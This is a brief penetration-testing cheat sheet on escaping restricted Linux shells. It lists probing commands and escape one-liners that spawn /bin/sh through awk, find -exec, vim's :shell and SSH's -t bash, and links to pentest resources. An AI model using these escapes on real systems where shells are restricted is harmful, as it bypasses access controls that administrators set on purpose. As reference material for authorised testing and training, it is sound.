Escaping Restricted Shells

First check what commands can we execute. Try running varied commands.

awk 'BEGIN {system("/bin/sh")}'
bash
cat
cd
cp
declare
echo
echo $PATH
echo $SHELL
echo /usr/bin/*
echo /home/<username>/bin/*
echo "bash -i" | tee rbypass.sh
ed
env
export
expect
find
find / -name foobar -exec /bin/sh \;
ftp
git
less
more
man ls
pinfo ls
links
lynx
mutt
ls
nano
nmap
ne
printenv
printf
# List all files in current directory
printf '%s\n' *(D)
pwd
set
sudo
sudo -l
tar
touch
vi
vim
whereis
which
whoami
zip

# Programming languages
perl
php
python
python2
python3
python3.x
ruby

# Commands with absolute path
/bin/bash
/bin/sh
/usr/bin/cat
/usr/bin/ls


# Special characters
>
>>
<
|
&
$
$(whoami)
;
:
'
"
`

Some command can be abused - check gtfobin - Example vim

vim

:set shell=/bin/sh

:shell

More at:

Restricted Linux Shell Escaping TechniquesFireShell Security Team

Restricted Shells Escaping TechniquesCertcube labs Cyber Security Research Blogs

Shell only allows us to execute the ls command with a specific set of arguments, such as ls -l or ls -a

ls -l `pwd` 

rbash

Add -t bash to the SSH connection command

Resources

HTB: SolidState0xdf hacks stuff

Linux Restricted Shell BypassVK9 Security

Restricted Shell (rbash, rzsh) Bypass - Exploit Notesexploit-notes.hdks.org